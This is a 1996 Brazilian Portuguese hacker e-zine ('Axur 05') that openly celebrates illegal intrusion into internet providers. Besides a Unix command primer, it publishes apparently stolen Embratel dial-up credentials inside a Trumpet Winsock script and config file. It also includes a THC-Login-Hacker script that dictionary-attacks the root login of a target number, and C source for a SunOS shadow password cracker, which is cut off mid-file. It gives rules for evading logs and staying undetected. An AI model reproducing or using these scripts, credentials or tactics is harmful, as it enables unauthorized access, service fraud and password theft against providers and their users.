-aa -a-a -x -x -u -u -r -rr -000 -55555 -a -a -x -x -u -u -r-r -0 -0-5 -a a-a -x -u -u -rr -0 -0-5555 -a -a -x -x -u -u -r -0 -0 -5 -a -a-x -x -uuu uu -r -000 -5555 -- = = [AXUR 05 - DARK SIDE HACKERS - BRAZIL] = = -- ~~~~ ~~ ~ ~~~~ ~~~~ ~~~~~~~ ~~~~~~ Axur 05 - revista mensal ( todos dia 01 na BBS mais pr¢xima). Hackerland, 30 de Dezembro de 1996 Revista n§ - 0.80 ( ver. beta final) Sem mestres, sem lamahs, sem deuses... somente no's e nossas ma'quinas. Pra salvar a honra dos Brasileiros! yO outside *fuck you* }-===============================[chain]===============================-{ Itz time to face the music bud... - GOD Simple... but really a pretty penny! - SATAN INDICE: 1-) OFFERTORIUM 2-) QUAL NOSSO OBJETIVO COM ESSE ZINE UNDERGROUND? 3-) EXISTE UMA ETICA SIM! 4-) COMECANDO A COMECAR... 5-) TECNICAS TELEFONICAS USADAS 6-) HUMM... UM SENHA DA EMBRATEL 7-) HACK SCRIPT PARA O LOGIN HACK/THC 8-) MEU PROPRIO DESENCRIPTADOR DE SENHAS... 9-) ANARCHY - by HaphazarD 10-) Cartas: ( como entrar em contato). *-) EXTRA BONUS - Senhas da KANOPUS e da NETVILLE }-===============================[chain]===============================-{ 1-) OFFERTORIUM... ~~~~~~~~~~~~~~ Bom, pra comeco de conversa escrever esse fat¡dico zine esta sendo dificil, esperamos inicialmente uma colaboracao da parte de voces para que realmen- te possamos comecar a nos divertir. Textos escritos por AciDmuD, VooDoo, HaphazarD e ???????... todos cidadoes conscientes do mal que estao fazendo a sociedade e pouco se importanto com o uso que os jovens inconsequentes farao do conteudo deste ou de outras das nossas publicacoes. Garanto que depois que sair o numero um vai aparecer um monte de bostinha fa- lando "Eles nao sao hackers, pois nao seguem a ETICA HACKER".... meus ami- gos, quem faz a ETICA e' voce proprio! Se nos quisermos sair por ai detonan- do problema e' nosso. Ja vou avisando, nao gostou - NAO LEIA. Essa revista e' pra voce que como no's nao tem medo de desafios. Copia restrita, liberada apenas para BBS cadastradas. Liberado o escambo por meio de correio eletronico. Qualquer publicacao indevida do texto abaixo devera conter de onde foi tirado e tal... }-===============================[chain]===============================-{ 2-) QUAL NOSSO OBJETIVO COM ESSE ZINE UNDERGROUND? ~~~~ ~~~~~ ~~~~~~~~ ~~~ ~~~~ ~~~~ ~~~~~~~~~~~ Desmistificar que nao existe hacker no Brasil e chutar a bunda dos prepotetes donos de provedores que exploram seus associados ate as tripas. Todos sabemos que a nossa raca esta em extincao, nao nos colocamos como hacker e sim como pessoas comuns que detem um conhecimento um pouco acima do normal e por esse motivo tem quase que a obrigacao de passa-los para nao levar consigo para a terra dos pes juntos exterminando assim com um referencial de quem procura um aprimoramento em hack, phreack...( somente para quem esta disposto `a aprender ), pois e' um saco ver um bando de garotos metidos que gostam apenas de apreender o truque em si e nao a te'cnica que foi usada e o metodo que esta sendo desenvolvido. Programa- dores sejam bem vindos... teremos prazer em divulgar fontes de programas ( pelo menos uma por edicao )especialmente desenvolvidos para finalidades ilegais. Sera bom para quem estuda programacao porque nos cortamos a ba- lela de falar, falar, falar... queremos acao! Nao temos nada contra a revista BARATA ELETRICA, mas entre no's o negocio e'muito fraco e sugere a proliferacao desenfreada de "burrinhos" como di- ria nosso amigo Derneval. Espero que os assuntos discutidos interessem a todos e os facam crescer ao nivel lah de fora, levando em conta que tomamos uma baita surra se formos tentar nos comparar a eles. Lembrando: " Hacker nao e' aquele que faz flood em um canal do IRC, nem aquele que manda mail bomb e muito menos aquele que cria virus com kitzi- nho e sai ai phudendo com os amigos", hacker e' aquele que ama seu compu- tador a ponto de transformar um XT inerte em um instrumento de desencrip- tacao ou que conheca o terreno onde pisa, conheca TCP/IP como soh ele, saiba todos os comandos do UNIX e seus parametros na ponta da lingua ou ainda esteja em contato pleno as novidades do seu mundo. " Nos so seremos livres o dia em que o ultimo dono de provedor for enfor- cado nas tripas do ultimo lamer." Li isso em algum lugar... e gostei! ;) AVISO---------------------- Lamahs deletem-me do seu HD. \del axur0500.txt }-===============================[chain]===============================-{ 3-) EXISTEM REGRAS SIM ~~~~~~~ ~~~~~~ ~~~ Ja disse, so estamos escrevendo esse monte de coisa por ser nosso primei- ro numero. Mas eï bom resaltar alguns aspectos para que nao haja besteira no inicio, detonar "SIM" mas na medida do necessario e de forma que voce novato nao seja pego. Sigam alguns mandamentos listados abaixo e o resto e' besteira. 1- Descobriu algo novo, OLHE 2- NAO APAGUE, pense no que seria melhor; ter acesso a um provedor ou detona-lo? 3- NAO MODIFIQUE NADA, ao menos que queira que saibam que esteve lah. 4- Nunca tente um su root direto! Isso fica logado ;-) 5- Nao fique dando telnet ou pegando mail usando acesso dos outros! 6- Nunca substime um sysop 7- Escolha horas entre 24:30 as 6:00 8- Uma vez lah dentro tente dominar o lugar, e' claro, com cautela. 9- Nao confie em ninguem. ( salve seu cachorro ou sua planta). 10- Se pegar a senha do root de algum provedor e nao souber o que fazer MATE-SE 11- Nao teste virus no seu proprio HD. 12- E' bom preparar muito bem uma estrateïgia antes de atacar. 13- Use os computadores de sua universidade ( e' mais seguro). 14- Nao fique distribuindo informacoes para ninguem ou dados sobre o que vc pegou. 15- NAO OBEDECA REGRAS. Claro que estas tem que ser cumpridas. 16- Nao tenha pena de ninguem. 17- Vc usa o MS-DOze ou o Windoze? Nao conte pra ninguem... 18- Vc usa o algum UNIX ou LINUX? Esteja certo que esta bem seguro... 19- Nao crie lacos afetivos com a vitima. 20- Aprenda o maximo que puder com quem sabe mais! Nao se meta a besta direto ULTIMO: Nao se submeta a nenhum sistema hierarquico. Administradores phe- dem. }-===============================[chain]===============================-{ 4-) COMECANDO A COMECAR ~~~~~~~~~ ~ ~~~~~~~ Nao adianta chorar boneca! Se quiser comecar a fazer alguma coisa delete de seu HD o windows ou o ms-dos... rode algo mais poderoso. Perg: "Papai... nao sei nada de UNIX como vou operar o melhor sistem mul- tiusuario do mundo? " Resposta: Vamos tentar colocar uma lista auto-explicativa de todos os co- mandos do UNIX, tendo em vista que alguns comandos mudam dependendo do UNIX. Imagino que voces saibam pelo menos do que estamos falando e tenham uma base disso. Nao tem misterio, mas so nao dah e' pra ficar parado. Vamos comecar bombardiando voces com comandos do UNIX, como existem vari- os tipos de UNIX ( HP-UX, AIX, SCO etc...) alguns comando diferem depen- dendo do seu sistema operacional, a medida do possivel vamos tentar colo- car os respectivos para cada sistema. Sendo que essa nao sera a ultima vez que abordaremos os comandos basicos e avancados do unix, pretendemos colocar voces bem por dentro antes de sair por ai falando besteira. Se voce esta atras de conhecimento mesmo acho que essa lista de comando ira lhe dar uma pequena base. Nao pense que somente com isso voce podera sair dizendo que ja sabe operar um sis. unix. Seja humilde e leia, vamos lah! Temos que comecar por ai mesmo, nas pro- ximas edicoes da revistas AXUR 05 vamos colocar mais e mais dicas sobre o nosso rapaz. Lista de comandos compilada por AciDmuD - (c)1996 - Global Domination Inc. COMANDO DESCRICAO ~~~~~~~ ~~~~~~~~~ as Esse e' o montador usado para montar fontes em linguagem asm. Pra ter uma melhor definicao e'me- lhor consultar o guia do System V. Opcao -o: nome que ouser quer dar ao arquivo .obj criado. Se nao usar o nome do arquivo vai sair co- mo o mesmo nome mas com o sufixo .o. Opcao -R: apaga o arquivo de entrada apos termino da montagem. Opcao -V: a versao do montador e' incluida na sai- da gravada na saida de erro. awk O filtro AWK e'um programa de analise de padroes que le arquivos linha por linha. As as instrucoes do comando AWK sao na verdade um poderosa lingua- gem de programacao. Seu formato geral e': awk `programa` nome(s)_de_arquivo(s) banner Programa usado pra fazer letras gigantes Os cara- cteres de entrada sao ecoados na saida padrao com letras gigantes. Pode ser usar no MAXIMO 10 cara- cteres e nao e' recomendado usar espaco pois esses serao usados como delimitadores de partes que apa- recem em partes separadas. Tente: banner Eu to aprendendo Pode direcionar para um arquivo: banner Eu to aprendo > legal.sim bdiff Compara dois arquivos grandes. bfs Procura um arquivo grande. cal Mostra o calendario. cat Concatena e imprine arquivos. cb Embelezador de C. Muito util para desenvolvedores de programas em UNIX. cb -s velhofonte.c > novofonte.c cc Esse e'o comando usado para chamar o compilador C do sistema unix. O formato geral e'o seguinte: cc opcao(oes) arquivo(s) As principais opcoes sao: -c: cria um arquivo .o que vai conter dados da fase de ligacao e edicao do processo. Normalmente o arquivo .o e' apagado durante o processo. cd Muda diretorio ( igual MS-DOS). chgrp Muda o dono de um arquivo. Esse comando e' phoda de explicar. Mas vamos tentar. Quando um arquivo e' criado sao lhe atribuidos va- lores de propriedade, os valores sao atribuidos de acordo com os valores umask do dono no momento da criacao do arquivo. Voce pode ser dono, grupo ou user. Comando usado e': chgrp novo_grupo nome_do_arquivo chmod Comando usado para mudar permissoes de arquivos Existe tres tipos de permissoes: r - read valor= 1 w - write valor= 2 x - execute valor= 4 Os arquivos listados ecoam da seguinte forma: 3 -r-xr-xr-x 1 uucp sys 1309 Jan 3 1986 Uutry Temos assim que olhar no rwx r-x r-x | | | | | | dono | | grupo | outros No caso o usuario tem r-x que na tabela de valo- res corresponde a 5 Podemos trocar uma permissao entao assim: chmod 005 nome_do_arquivo Ai o arquivo ficaria assim: 3 -------r-x 1 uucp sys 1309 Jan 3 1986 Uutry Ou poderia faze-lo assim: chmod a+rw nome_do_arquivo O caracter "a" antes do +rw significa "todos os grupos". O sinal + e - sao para atribuir e retirar respec- tivamente. chown Comando usado para passar a propriedade de um pa- ra outra pessoa. O formato geral do comando e': chown novo_dono nome_do_arquivo cmp Compara dois arquivos e mostra localizacao linha e byte desde a primeira diferenca. Caso do conteudo ser identico e nao imprimi nada na tela. Tem duas opcoes -l pra lista longa e -s para lis- ta curta. comm Compara dois arquivos e determina qual linha e' comum para os dois cp Copia um arquivo para outra localizacao. Muito usado para duplicar arquivos. Formato geral: cp arquivo1 arquivo2 Sendo que o arquivo1 e´ o arquivo de entrada, e o arquivo2 o arquivo de saida, este pode ser dire- cionado para qualquer localizacao. CUIDADO: Esse comando nao pede confirmacao, logo tenha certeza do que esta fazendo, caso contrario podera modificar o conteudo do seus arquivos. cpio E' um comando muito importante do UNIX e tb muito util geralmente usado para copias de seguranca. Ele faz a copia de entrada e saida, e´ particular- mente poderoso quando combinado com o comando 'find' e o comando 'ls' em um instrucao composta. Ele tem tres modos basicos que sao determinados pelas opcoes -o, -i e -p. A opcao -o indica que o comando cpio deve criar um arquivo especial de saida que sera lido pelo comando -i. O arquivo de saida criado usando a opcao -o e' um arquivo sequencial e pode ser manipulado por ou- tros comandos, como o pack e o unpack. Podemos usar um enlace de comunicacao por meio do arquivo de transmissao do uucp. Podemos ate copi- ar algo de um sistema unix para uma rede local. Voce deve criar o arquivo de transmissao com o cpio e transmitir com o uucp. Vamos criar o arquivo de transmissao: find /usr/tsm - print | cpio -ocv > arqtransm No caso o arquivo find comeca no diretorio /usr/tsm e imprime os nomes dos arquivos na saida padrao pegando todos os subdiretorios que se en- contram desse nivel em diante. A opcao -ocv significa que o cpio deve criar um arquivo de saida (o) onde as informacoes do cabe- calho deve ser gravadas em ASCII, para assegurar portabilidade (c), e que a medida que cada arqui- vo for processado, seu nome deve ser exibido na tela. Uma vez tendo o arquivo de saida arqtransm podemos envia-lo pelo comando uucp. Uma pratica comum e' compactar os arquivos para que a transmissao suce- da de um modo mais rapido e com menas quantidade de dados. Pode compactar com o pack e descompactar com o unpack, mais tarde explicarei isso. Antes de executar o cpio seria necessario tornar corrente o diretorio /usr/wbu. Usando o nome arq- transm de nosso exemplo anterior, a seguinte linha de comando seria entao usada para le-lo e restaurar os arquivos e diretorios que contem: cpio -icduvm < /usr/spool/uucppub/arqtransm As opcoes (-icduvm) podem aparecer em qualquer or- dem, essa ordem e´ a convencionada. Com a opcao -i primeiro da pra observar qual operacao o cpio esta usando. A opcao -d indica os que os diretorios nao existentes no destino devem ser criados; a opcao -u indica que todos os arquivos do arquivo de en- trada devem ser restaurados, substituindo eventuais arquivos com mesmo nome no diretorio de destino. A acao de restauracao tomada pela opcao -u nao e' especificada a manter o nome do arquivo mais novo dos dois; isso e' determinada pelo registro de da- ta e hora presente no inodo do arquivo. O operador de redirecionamento indica onde esta lo- calizado o arquivo de entrada do cpio, nesse caso o percurso absoluto /usr/spool/uucppublic/arqtransm. O diretorio /usr/spool/uucppublic e' aberto para ser acessado por todos e e´ onde o uucp coloca da- dos sem se preocupar com as permissoes de acesso do arquivo. O modo -p (passe) permite copia em massa, executando o processamento de entrada e de saida em uma unica operacao: find /usr/tsm -print | cpio -pduvm /usr/wbu Esse comando primeiro executa o find para criar uma lista dos arquivos e diretorios que serao usa- dos como entrada do cpio. A saida sera colocada no diretorio chamado /usr/wbu. Nesse exemplo, todos os arquivos com nomes identi- cos ja existentes no diretorio de destino serao substituidos pois a opcao -u foi usada. cu E' o comando que chama UNIX (call UNIX) estabele- ce uma sessao com outro sistema remoto. cut Comando usado para extrair informacoes seleciona- das de um arquivo de entrada. Opcao -d e´ usada para espefificar o caracter delimitador, se nao colocar nada ele pega como padrao um unico espaco em branco. Opcao -f e' usada para indicar quais campos serao recortados. Tipo assim, para listar todas as IDs de usuarios e seus nomes, o seguinte comando poderia ser usado: cat /etc/passwd | cut -d":" -f1,5 date Exibe a data do sistema: Dia Mes dd hh:mm:ss TZ ( time zone) aaaa Esse comando nao e' muito interessante para en- trarmos em detalhes. df Mostra o espaco livre no file system. diff Mostra na tela diferencas entre dois arquivos ou diretorios. diff3 Mostra na tela diferencas entre tres arquivos ou diretorios. du Reports de um file sistem usado. echo Mostra na tela um argumento. ed Editor de texto padrao distribuido com a maioria dos sistemas UNIX. Nao e' tao rico como os edito- res de texto do padrao MS-DOS. Mas o negocio ta mudando rapidamente, pode ser alternado com o vi. egrep Da familia dos comandos grep de busca de padroes. Ele geralmente aceita expressoes regulares que o grep nao aceita. Pode ser: egrep Rudi+ /etc/passwd Vai listar todas as entradas no arquivo que possu- irem o nome Rudi. Outra forma de fazer isso e´ usando a saida ecoada: cat/etc/passwd | egrep Rudi+ Essa forma e´ mais lenta pq primeiro copia o arqui- vo e depois filtra. fgrep E' o grep rapido. Por nao usar tempo nenhum na a- valiacao das expressoes como ocorre no comando e- grep. So aceita cadeias como padrao de busca. f77 Compilador FORTRAN. find Localiza um arquivo com caracteristicas especi- ficadas --------------------- O RESTO DA LISTA NA PROXIMA EDICAO ----------------- Comecem com isso, acho que jogar tantos comandos de uma vez so nao e' legal portanto, na proxima AXUR 05 vamos colocar o resto dos comandos. Nosso objetivo e' criar a maior lista compilada em um arquivo ate hoje de comandos de UNIX em portugues. Tomara que o nosso trabalho valha a pena! ;) }-===============================[chain]===============================-{ 6-) HUMM... UMA SENHA DA EMBRATEL ~~~~~~~ ~~~ ~~~~~ ~~ ~~~~~~~~ Esse script deve ser usado com o Trumpet Winsock. O script em si e' uma fonte que eu usei de um provedor gaucho, usei ele porque ele e' muito bem feito e facilitou o trabalho. O provedor o qual nao citarei o nome nao tem nada a ver com nossas en- crencas, falo isso pq conheco o pessoal de lah e eles sao realmente ba- canas. ;) P: De quem e' essa conta? R: De um escola de computacao filha da puta de Canoas-RS. P: Qual o crime que eles cometeram? R: Cursos caros com baixa qualidade...formando assim mais "burrinhos" P: Isso nao e' arriscado demais? R: Bom... atravesar a rua hoje em dia e' arriscado. P: EU PAGO ALGUMA COISA? R: O acesso e' FREE, mas a taxa telefonica e' por sua responsabilidade. Pode distribuir esse script para quem voce quiser, mas nao esqueca de deixar o nome do autor ;) #corte aqui------------------login.cmd-------------------------------- #ACID-HACK-ACID-HACK-ACID-HACK-ACID-HACK-ACID-HACK-ACID-HACK-ACID-HAC# # # # AciD HackNet # # (c)Reg. AciDmuD 10/08/96 # # - acidmud@thepentagon.com - # # # ###################################################################### # # # Desculpa a desorganizacao dos codigos do script ta meio # # improvisado! Mas funciona mesmo. # # # #ACID-HACK-ACID-HACK-ACID-HACK-ACID-HACK-ACID-HACK-ACID-HACK-ACID-HAC# %tentativas = 16 $inicmodem = "AT&C1E1X4" # O comando AT e normal, ja o X3 despresa o sinal de ocupado # eu uso no meu modem por causa da central. Mas nao faz mal. # Se quiser tirar pode tirar... # O 0, serve para chamar linha no caso de central telefonica. $dialstr = "ATX3DP0," load $password $numero = "0900992880" $numero2 = "0900991440" load $password if [password "Nao precisa colocar nada, so pressione enter:"] save $password end load $username if [username "Nao precisa colocar nada, so pressione enter:"] save $password end output "ATZ"\13 if ! [input 10 OK\n] display \n"Modem nao responde."\n display \n"Verifique sua configuracao."\n abort end output $inicmodem\13 input 10 OK\n display "Inicio da discagem." %tentativas "tentativas, caso ocupado."\n %n = 0 %ok = 0 repeat %timeout = 1 while %timeout %timeout = [read 2 $branco] end if %n = %tentativas display \n"Ocupado mesmo apos" %tentativas "tentativas"\n output +++ output ATH0\r abort end %n = %n + 1 display \n"yO!. Hacking.... (tentativa" %n")..."\n outputecho $dialstr $numero\13 if $numero = $numero1 $numero = $numero2 else if $numero = $numero2 $numero = $numero1 end end $result = "" $result2 = "" while $result = "" %timeout = [read 80 $result] if !%timeout $result = "MODEM NAO RESPONDE" end end $result2 = copy($result,1,7) until $result2 = "CARRIER" | $result2 = "CONNECT" | $result2 = "PROTOCO" %timeout = 1 %timeout = [wait 15 dcd] if !%timeout display \n"Seu modem nao esta bem configurado." \n display \n"Verifique a configuracao do seu modem."\n end input 30 name: output $username\13 input 30 word: output \p\13 input 30 > output ppp default\13 address 30 input 30 \n display \n display "Yo! Tudo deu certo... voce ja esta conectado!."\n display \n"(c)Reg. by AciDmuD - acidmud@thepentagon.com."\n #corte aqui-----------------login.cmd-------------------------------- Agora voce deve renomear seu arquivo trumpwsk.ini para trumpwsk.old e criar um novo arquivo trumpsk.ini com o conteudo abaixo #corte aqui------------------trumpwsk.ini----------------------------- [Trumpet Winsock] ip=200.255.255.89 netmask=0.0.0.0 gateway=0.0.0.0 dns=200.255.253.241 time=200.255.253.241 domain=embratel.net.br vector=60 mtu=296 rwin=1024 mss=256 rtomax=60 ip-buffers=32 slip-enabled=1 slip-port=2 slip-baudrate=28800 slip-handshake=1 slip-compressed=1 dial-option=0 online-check=1 inactivity-timeout=5 slip-timeout=0 slip-redial=0 dial-parity=0 font=Courier,9 registration-name="" registration-password="h[G?"Rgl" use-socks=0 socks-host=0.0.0.0 socks-port=1080 socks-id= socks-local1=0.0.0.0 0.0.0.0 socks-local2=0.0.0.0 0.0.0.0 socks-local3=0.0.0.0 0.0.0.0 socks-local4=0.0.0.0 0.0.0.0 ppp-enabled=1 ppp-usepap=0 ppp-username="" ppp-password="" win-posn=88 88 636 408 21 408 -4 -4 3 trace-options=0 [default vars] $username=sispro $password=;/"tkWi #corte aqui------------------trumpwsk.ini----------------------------- }-===============================[chain]===============================-{ 7-) LOGIN HACK PARA O HACK LOGIN/THC ~~~~~ ~~~~ ~~~~ ~ ~~~~ ~~~~~~~~~ A muito tempo o pessoal tava perguntando, onde eu posso pegar um programa que tente logar alguma coisa usando como base de tentativas um .dic... Bom. O melhor que eu conheco e' o LOGINH.ZIP da THC que recebi da L.o.r.E uma das melhores BBSz da Europa, mas e como usar sendo o padrao telefoni- co brasileiro diferente. Voces nao vao encontrar problema nao, basta fazer direitinho. Primeiro lugar voces vao ter que ir atras do loginh.zip, o arquivo esta por ai. Nao adianta nos mandar mail que nao vamos mandar ele para ninguem. Nao por nao querer e sim pq se formos atender a todos nos estamos fudidos. Depois de pegar o dito cujo voces devem configurar o programa, coisa mui- to facil e' quase que automatico. Agora voces vao ter que catar o programa LH-COMP.EXE que tambem e' da THC sendo que esse vai compilar o script hacker para ser usado com o LOGINH. Quando eu peguei o LOGINH, no pacote esse programa veio junto. Como compilar o script DEC-SERV.LHK ----------------------------------- Facilimo! Recorte onde esta indicando e crie um arquivo chamado de DEC-SERV.LHK onde voce deve colar o conteudo aqui asinalado. Nao se esqueca de mudar a fonte desse arquivo e colocar numero do tele- fone e outros dados necessarios para funcionar. Depois escreva no prompt: lh-comp dec-serv.lhk Voce vai notar que vai aparecer no seu diretorio o arquivo DEC-SERV.SCR este e'o script em si, ja compilado. * Com o passar do tempo se a revista for um sucesso ( o que vai depender de voce ) nos vamos criar um FTP com os programas que citamos. Coloque esse arquivo DE-SERV.SCR no mesmo diretorio que o LOGINH.EXE Execute o LOGINH.EXE e carregue o arquivo. Ate crianca consegue fazer isso... Se nao conseguir voce nao merece faze-lo mesmo! ];) NOTA: Voce pode modificar a fonte, mas nao mude o nome do autor. Caso voce crie um script bom, mande que nos publicamos. ;corte aqui-------------------DEC-SERV.LHK----------------------------- ; ; ; ---------------------------------------------------------------------- ; Dec-Telnet-Platform Script for THC-Login-Hacker v0.9á (by Tron X) ; Global Domination Inc. - by VooDoo and AciDmuD -Brazil- 1996 ; ---------------------------------------------------------------------- ; *Fonte do script original modificada para atender aos padroes ; brasileiro. - acidmud@thepentagon.com - ; ---------------------------------------------------------------------- ; Tudo que aparecer com o sinal ";" na frente e' comentario ou instru- ; cao. ; ; #DEFINE ; Abaixo inicializacao do modem ( Default AT Z) init_modem=at z ; 8 bits sem paridade init_data=8n1 ; Abaixo arquivo onde ficarao logados os comentarios. LOGFILE=c:\output\hacklog.log ; Telefone alvo PHONE_NR=0,2228344 ; Numero de discagens ( O 0 significa infinitas vezes.) DIAL_TRIES=0 ; Numero de vezes para tentar logar LOGIN_TRIES=0 ; Coloque abaixo o caminho onde se localiza sua wordlist. Se voce quiser ; pode ter mais que um caminho, tirando o sinal ";" da frente do dic(2). DIC(1)=C:\hacking\diction.ary\vh_basic.dic ;dic(2)=c:\hacking\bigdict2.txt ;dic(3)=c:\hacking\bigdict3.txt #NOCARRIER LOG(NO CARRIER) LOG(ON $DATE $TIME) LOG(AT $DIC(1)) LOG(retornando ...) GOTO(#START) #START HANGUP LOG_SESSION_ON LOG() log(---------------------------------------------) log( Brazil - (c)Reg. by AciDmuD and VooDoo) log( Global Domination Inc. - 1996 -) log() log( Iniciando processo .....) log() log( ALVo: $PHONE_NR ) log( DATa: $DATE ) log( HORa: $TIME) log() log() log( ......DiSCANDO) dial log() log( ......CONECTADO!) log() log() wait(5) :1 wait4string(1,^M,5,goto(#start),sername>) send(fh65) :2 wait4string(1,^M,5,goto(#start),ocal>) send(connect 189.25.56.7) :3 if string~sconnected then goto(2) if string~ncorrect then goto(3) wait4string(1,^C,5,goto(4),ogin:) send(root) if string~sconnected then goto(2) if string~ncorrect then goto(3) :4 if string~sconnected then goto(2) if string~ncorrect then goto(3) wait4string(1,^D,5,goto(4),assword:) send_next_dic(1) if string~sconnected then goto(2) if string~ncorrect then goto(3) :5 if string~sconnected then goto(2) if string~ncorrect then goto(3) :6 wait(1) if string~sconnected then goto(2) if string~ncorrect then goto(3) wait(1) if string~sconnected then goto(2) if string~ncorrect then goto(3) wait(1) if string~sconnected then goto(2) if string~ncorrect then goto(3) wait(1) if string~sconnected then goto(2) if string~ncorrect then goto(3) wait(1) if string~sconnected then goto(2) if string~ncorrect then goto(3) wait(1) if string~sconnected then goto(2) if string~ncorrect then goto(3) wait(1) if string~sconnected then goto(2) if string~ncorrect then goto(3) wait(1) if string~sconnected then goto(2) if string~ncorrect then goto(3) wait(1) if string~sconnected then goto(2) if string~ncorrect then goto(3) :7 beep beep beep beep beep beep beep beep beep log() log() log() Log(...... TENTATIVA DE HACK FOI BEM SUCEDIDA!!!!!!!!!!) log() log( TELEFONE: $PHONE_NR DATA: $DATE HORA: $TIME) log() log() log() log( ACCouNT: root) log( PaSSWoRD: DIC(1)) log() log() log() #END ;corte aqui-------------------DEC-SERV.LHK----------------------------- }-===============================[chain]===============================-{ 8-) MEU PROPRIO DESENCRIPTADOR DE SENHAS... ~~~ ~~~~~~~ ~~~~~~~~~~~~~~ ~~ ~~~~~~~~~ Essa é a fonte de um desencriptador de senhas do arquivo shadow padrao SUNOS. O desencriptador e´um programa que apartir de uma wordlist e um arquivo com as senhas encriptadas ( e´ claro) recria o valor dos codigos dando assim o login com seu respectivo password. Corte a linha abaixo e cole em um arquivo vazio, para isso use um editor de textos, logo apos compile ele. Nao fomos nos que fizemos, devemos creditos a The Shining/UPi(UK Division) ---CORTE AQUI----------------------------------------------------------- /* Program : Shadow Crack Author : (c)1996 The Shining/UPi (UK Division) Date : Released 12/4/96 Unix type : Somente para arquivos shadowed do sistema SUNOS */ #include #include #include #include #include #define WORDSIZE 20 /* Tamanho maximo da palavra */ #define OUTFILE "data" /* Arquivo que armazena info. da conta crackeada */ void word_strat( void ), do_dict( void ); void add_nums( char * ), do_comment( char * ); void try_word( char * ), reverse_word( char * ); void find_mode( void ), burst_mode( void ); void mini_burst( void ), brute_force( void ); void user_info( void ), write_details( char * ); void pwfile_name( void ), disable_interrupts( void ), cleanup(); char *logname, *comment, *homedir, *shell, *dict, *mode, *pwfile, *pwdauth(); struct passwd *getpwnam(), *pwentry; extern char *optarg; int option, uid, gid; int main( int argc, char **argv ) { disable_interrupts(); system("clear"); if (argc < 2) { printf("Shadow Crack - (c)1996 The Shining\n"); printf("SUNOS Shadow password brute force cracker\n\n"); printf("useage: %s -m[mode] -p[pwfile] -u[loginid] ", argv[0]); printf("-d[dictfile]\n\n\n"); printf("[b] is burst mode, scans pwfile trying minimum\n"); printf(" password strategies on all i.d's\n\n"); printf("[i] is mini-burst mode, scans pwfile trying both\n"); printf(" userid, gecos info, and numbers to all i.d's\n\n"); printf("[f] is bruteforce mode, tries all above stategies\n"); printf(" as well as dictionary words\n\n"); printf("[pwfile] Uses the password file [pwfile], default\n"); printf(" is /etc/passwd\n\n"); printf("[loginid] Account you wish to crack, used with\n"); printf(" -mf bruteforce mode only\n\n"); printf("[dictfile] uses dictionary file [dictfile] to\n"); printf(" generate passwords when used with\n"); printf(" -mf bruteforce mode only\n\n"); exit(0); } /* Get options from the command line and store them in different variables */ while ((option = getopt(argc, argv, "m:p:u:d:")) != EOF) switch(option) { case 'm': mode = optarg; break; case 'p': pwfile = optarg; break; case 'u': logname = optarg; break; case 'd': dict = optarg; break; default: printf("wrong options\n"); break; } find_mode(); } /* Routine to redirect interrupts */ void disable_interrupts( void ) { signal(SIGHUP, SIG_IGN); signal(SIGTSTP, cleanup); signal(SIGINT, cleanup); signal(SIGQUIT, cleanup); signal(SIGTERM, cleanup); } /* If CTRL-Z or CTRL-C is pressed, clean up & quit */ void cleanup( void ) { FILE *fp; if ((fp = fopen("gecos", "r")) != NULL) remove("gecos"); if ((fp = fopen("data", "r")) == NULL) printf("\nNo accounts cracked\n"); printf("Quitting\n"); exit(0); } /* Function to decide which mode is being used and call appropriate routine */ void find_mode( void ) { if (strcmp(mode, "b") == NULL) burst_mode(); else if (strcmp(mode, "i") == NULL) mini_burst(); else if (strcmp(mode, "f") == NULL) brute_force(); else { printf("Sorry - No such mode\n"); exit(0); } } /* Get a users information from the password file */ void user_info( void ) { uid = pwentry->pw_uid; gid = pwentry->pw_gid; comment = pwentry->pw_gecos; homedir = pwentry->pw_dir; shell = pwentry->pw_shell; } /* Set the filename of the password file to be used, default is /etc/passwd */ void pwfile_name( void ) { if (pwfile != NULL) setpwfile(pwfile); } /* Burst mode, tries user i.d. & then reverses it as possible passwords on every account found in the password file */ void burst_mode( void ) { pwfile_name(); setpwent(); while ((pwentry = getpwent()) != (struct passwd *) NULL) { logname = pwentry->pw_name; user_info(); try_word( logname ); reverse_word( logname ); } endpwent(); } /* Mini-burst mode, try above combinations as well as other strategies which include adding numbers to the end of the user i.d. to generate passwords or using the comment field information in the password file */ void mini_burst( void ) { pwfile_name(); setpwent(); while ((pwentry = getpwent()) != (struct passwd *) NULL) { logname = pwentry->pw_name; user_info(); word_strat(); } endpwent(); } /* Brute force mode, uses all the above strategies as well using a dictionary file to generate possible passwords */ void brute_force( void ) { pwfile_name(); setpwent(); if ((pwentry = getpwnam(logname)) == (struct passwd *) NULL) { printf("Sorry - User unknown\n"); exit(0); } else { user_info(); word_strat(); do_dict(); } endpwent(); } /* Calls the various password guessing strategies */ void word_strat() { try_word( logname ); reverse_word( logname ); add_nums( logname ); do_comment( comment ); } /* Takes the user name as its argument and then generates possible passwords by adding the numbers 0-9 to the end. If the username is greater than 7 characters, don't bother */ void add_nums( char *wd ) { int i; char temp[2], buff[WORDSIZE]; if (strlen(wd) < 8) { for (i = 0; i < 10; i++) { strcpy(buff, wd); sprintf(temp, "%d", i); strcat(wd, temp); try_word( wd ); strcpy(wd, buff); } } } /* Gets info from the 'gecos' comment field in the password file, then process this information generating possible passwords from it */ void do_comment( char *wd ) { FILE *fp; char temp[2], buff[WORDSIZE]; int c, flag; flag = 0; /* Open file & store users gecos information in it. w+ mode allows us to write to it & then read from it. */ if ((fp = fopen("gecos", "w+")) == NULL) { printf("Error writing gecos info\n"); exit(0); } fprintf(fp, "%s\n", wd); rewind(fp); strcpy(buff, ""); /* Process users gecos information, separate words by checking for the ',' field separater or a space. */ while ((c = fgetc(fp)) != EOF) { if (( c != ',' ) && ( c != ' ' )) { sprintf(temp, "%c", c); strncat(buff, temp, 1); } else flag = 1; if ((isspace(c)) || (c == ',') != NULL) { if (flag == 1) { c=fgetc(fp); if ((isspace(c)) || (iscntrl(c) == NULL)) ungetc(c, fp); } try_word(buff); reverse_word(buff); strcpy(buff, ""); flag = 0; strcpy(temp, ""); } } fclose(fp); remove("gecos"); } /* Takes a string of characters as its argument(in this case the login i.d., and then reverses it */ void reverse_word( char *wd ) { char temp[2], buff[WORDSIZE]; int i; i = strlen(wd) + 1; strcpy(temp, ""); strcpy(buff, ""); do { i--; if ((isalnum(wd[i]) || (ispunct(wd[i]))) != NULL) { sprintf(temp, "%c", wd[i]); strncat(buff, temp, 1); } } while(i != 0); if (strlen(buff) > 1) try_word(buff); } /* Read one word at a time from the specified dictionary for use as possible 